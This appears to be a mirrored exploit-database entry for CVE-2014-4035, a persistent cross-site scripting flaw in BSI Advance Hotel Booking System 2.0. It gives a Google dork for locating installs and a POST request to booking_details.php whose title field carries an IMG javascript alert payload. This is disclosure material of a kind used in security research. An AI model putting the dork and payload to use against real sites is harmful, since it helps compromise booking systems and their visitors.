[] NeoSense
E X P L O I T S
title author type platform port cve id

BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting

Author: Angelo Ruwantha
type: webapps
platform: php
port: 80.0
date_added: 2019-08-12 
date_updated: 2019-08-12 
verified: 0 
codes: CVE-2014-4035 
tags: Cross-Site Scripting (XSS)
aliases:  
screenshot_url:  
application_url: 
# Exploit Title:BSI Advance Hotel Booking System Persistent XSS
# Google Dork: intext:Hotel Booking System v2.0 © 2008 - 2012 Copyright Best Soft Inc
# Date: Wed Jun 4 2014
# Exploit Author: Angelo Ruwantha
# Vendor Homepage: http://www.bestsoftinc.com
# Software Link: http://www.bestsoftinc.com/php-advance-hotel-booking-system.html
# Version: V2.0
# Tested on: archlinux
# CVE : CVE-2014-4035

Vulnerability
========================

[+]Method:POST

1.http://URL/hotel-booking/booking_details.php (;persistent XSS)

allowlang=&title=<IMG SRC="javascript:alert('HelloWorld ;)');"&fname=&lname=&str_addr=&city=&state=&zipcode=&country=&phone=&fax=&email=&payment_type=&message=&tos=


every parameter injectable :)
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.